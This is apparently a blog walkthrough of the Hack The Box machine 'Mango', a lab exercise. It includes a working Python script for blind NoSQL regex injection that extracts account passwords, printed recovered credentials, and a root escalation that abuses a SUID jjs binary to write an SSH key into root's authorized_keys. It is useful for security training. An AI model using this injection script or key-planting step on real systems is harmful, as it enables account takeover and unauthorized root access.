Mango

TL;DR

  • Find the stagging subdomain
  • Exploit NoSQL Blind Injection based on the HTTP response code to retrieve admin’s and mango’s password
  • SSH connection with mango user and switch to admin with the previously recovered password
  • Exploit jjs SUID binary to be root

User.txt

Reconnaissance

Let’s start by a Nmap scan:

magnussen@funcMyLife:~/mango$ nmap -sS -sV -sC -p- -vvv --min-rate 5000 --reason -oN mango.txt
# Nmap 7.60 scan initiated Sat Feb 15 11:24:34 2020 as: nmap -sS -sV -sC -p- -vvv --min-rate 5000 --reason -oN test.txt 10.10.10.162
Increasing send delay for 10.10.10.162 from 0 to 5 due to 424 out of 1412 dropped probes since last increase.
Increasing send delay for 10.10.10.162 from 5 to 10 due to 479 out of 1596 dropped probes since last increase.
Warning: 10.10.10.162 giving up on port because retransmission cap hit (10).
Nmap scan report for staging-order.mango.htb (10.10.10.162)
Host is up, received reset ttl 63 (0.038s latency).
Scanned at 2020-02-15 11:24:34 CET for 51s
Not shown: 65525 closed ports
Reason: 65525 resets
PORT      STATE    SERVICE         REASON         VERSION
22/tcp    open     ssh             syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDXYCdNRHET98F1ZTM+H8yrD9KXeRjvIk9e78JkHdzcqCq6zcvYIqEZReb3FSCChJ9mxK6E6vu5xBY7R6Gi0V31dx0koyaieEMd67PU+9UcjaAujbDS3UgYzySN+c5GV/ssmA6wWHu4zz+k+qztqdYFPh0/TgrC/wNPWHOKdpivgoyk3+F/retyGdKUNGjypXrw6v1faHiLOIO+zNHorxB304XmSLEFswiOS8UsjplIbud2KhWPEkY4s4FyjlpfpVdgPljbjijm7kcPNgpTXLXE51oNE3Q5w7ufO5ulo3Pqm0x+4d+SEpCE4g0+Yb020zK+JlKsp2tFJyLqTLan1buN
|   256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDqSZ4iBMzBrw2lEFKYlwO2qmw0WPf76ZhnvWGK+LJcHxvNa4OQ/hGuBWCjVlTcMbn1Te7D8jGwPgbcVpuaEld8=
|   256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (EdDSA)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB1sFdLYacK+1f4J+i+NCAhG+bj8xzzydNhqA1Ndo/xt
80/tcp    open     http            syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Mango | Sweet & Juicy
443/tcp   open     ssl/http        syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Mango | Search Base
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN/localityName=None/emailAddress=admin@mango.htb/organizationalUnitName=None
| Issuer: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN/localityName=None/emailAddress=admin@mango.htb/organizationalUnitName=None
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2019-09-27T14:21:19
| Not valid after:  2020-09-26T14:21:19
| MD5:   b797 d14d 485f eac3 5cc6 2fed bb7a 2ce6
| SHA-1: b329 9eca 2892 af1b 5895 053b f30e 861f 1c03 db95
| -----BEGIN CERTIFICATE-----
| MIIEAjCCAuqgAwIBAgIJAK5QiSmoBvEyMA0GCSqGSIb3DQEBCwUAMIGVMQswCQYD
| VQQGEwJJTjENMAsGA1UECAwETm9uZTENMAsGA1UEBwwETm9uZTEXMBUGA1UECgwO
| TWFuZ28gUHJ2IEx0ZC4xDTALBgNVBAsMBE5vbmUxIDAeBgNVBAMMF3N0YWdpbmct
| b3JkZXIubWFuZ28uaHRiMR4wHAYJKoZIhvcNAQkBFg9hZG1pbkBtYW5nby5odGIw
| HhcNMTkwOTI3MTQyMTE5WhcNMjAwOTI2MTQyMTE5WjCBlTELMAkGA1UEBhMCSU4x
| DTALBgNVBAgMBE5vbmUxDTALBgNVBAcMBE5vbmUxFzAVBgNVBAoMDk1hbmdvIFBy
| diBMdGQuMQ0wCwYDVQQLDAROb25lMSAwHgYDVQQDDBdzdGFnaW5nLW9yZGVyLm1h
| bmdvLmh0YjEeMBwGCSqGSIb3DQEJARYPYWRtaW5AbWFuZ28uaHRiMIIBIjANBgkq
| hkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5fimSfgq3xsdUkZ6dcbqGPDmCAJJBOK2
| f5a25At3Ht5r1SjiIuvovDSmMHjVmlbF6qX7C6f7Um+1Vtv/BinZfpuMEesyDH0V
| G/4X5r6o1GMfrvjvAXQ2cuVEIxHGH17JM6gKKEppnguFwVMhC4/KUIjuaBXX9udA
| 9eaFJeiYEpdfSUVysoxQDdiTJhwyUIPnsFrf021nVOI1/TJkHAgLzxl1vxrMnwrL
| 2fLygDt1IQN8UhGF/2UTk3lVfEse2f2kvv6GbmjxBGfWCNA/Aj810OEGVMiS5SLr
| arIXCGVl953QCD9vi+tHB/c+ICaTtHd0Ziu/gGbdKdCItND1r9kOEQIDAQABo1Mw
| UTAdBgNVHQ4EFgQUha2bBOZXo4EyfovW+pvFLGVWBREwHwYDVR0jBBgwFoAUha2b
| BOZXo4EyfovW+pvFLGVWBREwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQsF
| AAOCAQEAmyhYweHz0az0j6UyTYlUAUKY7o/wBHE55UcekmWi0XVdIseUxBGZasL9
| HJki3dQ0mOEW4Ej28StNiDKPvWJhTDLA1ZjUOaW2Jg20uDcIiJ98XbdBvSgjR6FJ
| JqtPYnhx7oOigKsBGYXXYAxoiCFarcyPyB7konNuXUqlf7iz2oLl/FsvJEl+YMgZ
| YtrgOLbEO6/Lot/yX9JBeG1z8moJ0g+8ouCbUYI1Xcxipp0Cp2sK1nrfHEPaSjBB
| Os2YQBdvVXJau7pt9zJmPVMhrLesf+bW5CN0WpC/AE1M1j6AfkX64jKpIMS6KAUP
| /UKaUcFaDwjlaDEvbXPdwpmk4vVWqg==
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 15 11:25:25 2020 -- 1 IP address (1 host up) scanned in 51.47 seconds

So we find 2 useful services on 3 ports:

  • SSH (22)
  • Apache (80)
  • Apache HTTP/SSL (443)

The only useful thing we recover from the HTTP page is the web server version:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 10.10.10.162 Port 80</address>
</body></html>

When we browse the HTTPS page, we find a “search engine”:

The last interesting thing we found with our nmap scan is the Common Name in the certificate: staging-order.mango.htb.

Let’s add it to our /etc/hosts and browse the page.

Nosql blind injection

We find a login form, I’m gonna take a wild guess that, according to the box name, the database engine is MongoDB and that it uses NoSQL.

If we send a NoSQL Injection (username is admin and password not equal to test) we get a 302 HTTP Response.

So we have a NoSQL Blind Injection based on the HTTP response code.

Let’s try to dump admin’s password:

#!/usr/bin/python3.6
# coding: utf-8
import requests
import string

if __name__ == '__main__':

    i = 1
    url = 'http://staging-order.mango.htb'
    params = {'username': 'admin', 'password[$regex]': None, 'login': 'login'}

    password = ""

    for i in range(30):
        for letter in string.printable:
            if letter in ['*', '+', '.', '?', '$', '|', '&', '^']:
                letter = "\\" + letter
            params['password[$regex]'] = '^' + password + letter
            request = requests.post(url, data=params, allow_redirects=False)

            if request.status_code == 302:
                password += letter
                print('Password: ' + password)

    print("Username: {0}\nPassword: {1}".format(params['username'], password))

With this script we find admin’s password:

Password: t9KcS3>!0B#2

Unfortunately, when we log in with this account, we only have this page.

We cannot log in with this account with SSH. We can find an other account with the same method:

Username: mango
Password: h3mXK8RhU~f{]f5H

When we log in with this account we have the same maintenance page, but we can log in with SSH to the server.

mango@mango:~$ id
uid=1000(mango) gid=1000(mango) groups=1000(mango)

Password spraying

Now that we have an SSH account, let’s try to find the user’s flag.

mango@mango:~$ ls -alh
total 44K
drwxr-xr-x 5 mango mango 4.0K Feb 15 10:51 .
drwxr-xr-x 4 root  root  4.0K Sep 27 14:02 ..
lrwxrwxrwx 1 mango mango    9 Sep 27 14:31 .bash_history -> /dev/null
-rw-r--r-- 1 mango mango  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 mango mango 3.7K Apr  4  2018 .bashrc
drwx------ 2 mango mango 4.0K Sep 28 15:27 .cache
-rw------- 1 mango mango  491 Feb 15 10:51 .dbshell
drwx------ 3 mango mango 4.0K Sep 28 15:27 .gnupg
-rw------- 1 mango mango    0 Feb 15 10:44 .mongorc.js
-rw-r--r-- 1 mango mango  807 Apr  4  2018 .profile
drwx------ 2 mango mango 4.0K Feb 15 10:31 .ssh
-rw------- 1 mango mango 7.9K Feb 15 10:42 .viminfo
mango@mango:~$ ls -alh /home/
total 16K
drwxr-xr-x 4 root root 4.0K Sep 27 14:02 .
drwxr-xr-x 23 root root 4.0K Sep 27 13:51 ..
drwxr-xr-x 2 admin admin 4.0K Feb 15 11:32 admin
drwxr-xr-x 5 mango mango 4.0K Feb 15 10:51 mango
mango@mango:~$ ls -alh /home/admin/
total 36K
drwxr-xr-x 2 admin admin 4.0K Feb 15 11:32 .
drwxr-xr-x 4 root  root  4.0K Sep 27 14:02 ..
lrwxrwxrwx 1 admin admin    9 Sep 27 14:30 .bash_history -> /dev/null
-rw-r--r-- 1 admin admin  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 admin admin 3.7K Apr  4  2018 .bashrc
-rw-rw-r-- 1 root  admin  475 Feb 15 11:10 .jjs.history
-rw------- 1 admin admin   40 Feb 15 11:32 .lesshst
-rw-r--r-- 1 admin admin  807 Apr  4  2018 .profile
-rw------- 1 admin admin  814 Feb 15 10:59 .viminfo
-r-------- 1 admin admin   33 Sep 27 14:29 user.txt

So the user.txt is located in the admin’s home directory, we can’t read it with the mango user.

Maybe the admin uses the same password as the previous form.

mango@mango:~$ su admin
Password:
$ id
uid=4000000000(admin) gid=1001(admin) groups=1001(admin)

Yeah! Let’s change the shell and read the user.txt.

$ /bin/bash
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
admin@mango:/home/mango$ cat /home/admin/user.txt
79bf31c6c6eb38a8567832f7f8b47e92

First flag done!

Let’s root this machine.

I AM ROOT

JJS

First thing, let’s enumerate SUID binaries:

admin@mango:/home/mango$ find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
-rwsr-xr-x 1 root root 30800 Aug 11  2016 /bin/fusermount
-rwsr-xr-x 1 root root 43088 Oct 15  2018 /bin/mount
-rwsr-xr-x 1 root root 26696 Oct 15  2018 /bin/umount
-rwsr-xr-x 1 root root 44664 Jan 25  2018 /bin/su
-rwsr-xr-x 1 root root 64424 Mar  9  2017 /bin/ping
-rwsr-xr-x 1 root root 40152 May 15  2019 /snap/core/7713/bin/mount
-rwsr-xr-x 1 root root 44168 May  7  2014 /snap/core/7713/bin/ping
-rwsr-xr-x 1 root root 44680 May  7  2014 /snap/core/7713/bin/ping6
-rwsr-xr-x 1 root root 40128 Mar 25  2019 /snap/core/7713/bin/su
-rwsr-xr-x 1 root root 27608 May 15  2019 /snap/core/7713/bin/umount
-rwsr-xr-x 1 root root 71824 Mar 25  2019 /snap/core/7713/usr/bin/chfn
-rwsr-xr-x 1 root root 40432 Mar 25  2019 /snap/core/7713/usr/bin/chsh
-rwsr-xr-x 1 root root 75304 Mar 25  2019 /snap/core/7713/usr/bin/gpasswd
-rwsr-xr-x 1 root root 39904 Mar 25  2019 /snap/core/7713/usr/bin/newgrp
-rwsr-xr-x 1 root root 54256 Mar 25  2019 /snap/core/7713/usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Jun 10  2019 /snap/core/7713/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jun 10  2019 /snap/core/7713/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 Mar  4  2019 /snap/core/7713/usr/lib/openssh/ssh-keysign
-rwsr-sr-x 1 root root 106696 Aug 30 07:09 /snap/core/7713/usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root dip 394984 Jun 12  2018 /snap/core/7713/usr/sbin/pppd
-rwsr-xr-x 1 root root 40152 May 16  2018 /snap/core/6350/bin/mount
-rwsr-xr-x 1 root root 44168 May  7  2014 /snap/core/6350/bin/ping
-rwsr-xr-x 1 root root 44680 May  7  2014 /snap/core/6350/bin/ping6
-rwsr-xr-x 1 root root 40128 May 17  2017 /snap/core/6350/bin/su
-rwsr-xr-x 1 root root 27608 May 16  2018 /snap/core/6350/bin/umount
-rwsr-xr-x 1 root root 71824 May 17  2017 /snap/core/6350/usr/bin/chfn
-rwsr-xr-x 1 root root 40432 May 17  2017 /snap/core/6350/usr/bin/chsh
-rwsr-xr-x 1 root root 75304 May 17  2017 /snap/core/6350/usr/bin/gpasswd
-rwsr-xr-x 1 root root 39904 May 17  2017 /snap/core/6350/usr/bin/newgrp
-rwsr-xr-x 1 root root 54256 May 17  2017 /snap/core/6350/usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Jul  4  2017 /snap/core/6350/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jan 12  2017 /snap/core/6350/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 Nov  5  2018 /snap/core/6350/usr/lib/openssh/ssh-keysign
-rwsr-sr-x 1 root root 98472 Jan 29  2019 /snap/core/6350/usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root dip 394984 Jun 12  2018 /snap/core/6350/usr/sbin/pppd
-rwsr-xr-x 1 root root 37136 Jan 25  2018 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 40344 Jan 25  2018 /usr/bin/newgrp
-rwsr-xr-x 1 root root 75824 Jan 25  2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 59640 Jan 25  2018 /usr/bin/passwd
-rwsr-xr-x 1 root root 37136 Jan 25  2018 /usr/bin/newgidmap
-rwsr-sr-x 1 root root 18161 Jul 15  2016 /usr/bin/run-mailcap
-rwsr-xr-x 1 root root 76496 Jan 25  2018 /usr/bin/chfn
-rwsr-xr-x 1 root root 44528 Jan 25  2018 /usr/bin/chsh
-rwsr-xr-x 1 root root 149080 Jan 18  2018 /usr/bin/sudo
-rwsr-sr-x 1 daemon daemon 51464 Feb 20  2018 /usr/bin/at
-rwsr-xr-x 1 root root 18448 Mar  9  2017 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 22520 Mar 27  2019 /usr/bin/pkexec
-rwsr-xr-- 1 root messagebus 42992 Jun 10  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 100760 Nov 23  2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 14328 Mar 27  2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-sr-- 1 root admin 10352 Jul 18  2019 /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
-rwsr-xr-x 1 root root 436552 Mar  4  2019 /usr/lib/openssh/ssh-keysign
-rwsr-sr-x 1 root root 101240 Mar 15  2019 /usr/lib/snapd/snap-confine

The jjs binary seems interesting as we can execute system command with it.

We can add our SSH public key in the authorized_keys file in /root/.ssh to log in as root with SSH.

admin@mango:/home/mango$ jjs -scripting
Warning: The jjs tool is planned to be removed from a future JDK release
jjs> $EXEC("echo 'ssh-rsa AAAAB3NzaC1[...]rCOKx' > /root/.ssh/authorized_keys");

Now we just have to log in with SSH with the root account and our public key.

magnussen@funcMyLife:~/.ssh$ ssh -i id_rsa.pub root@10.10.10.162
root@mango:~# id
uid=0(root) gid=0(root) groups=0(root)
root@mango:~# cat root.txt
8a8ef79a7a2fbb01ea81688424e9ab15

This was my first Hack The Box machine, not a very difficult one but I’ve learned a few things and it was a pretty good introduction to HTB.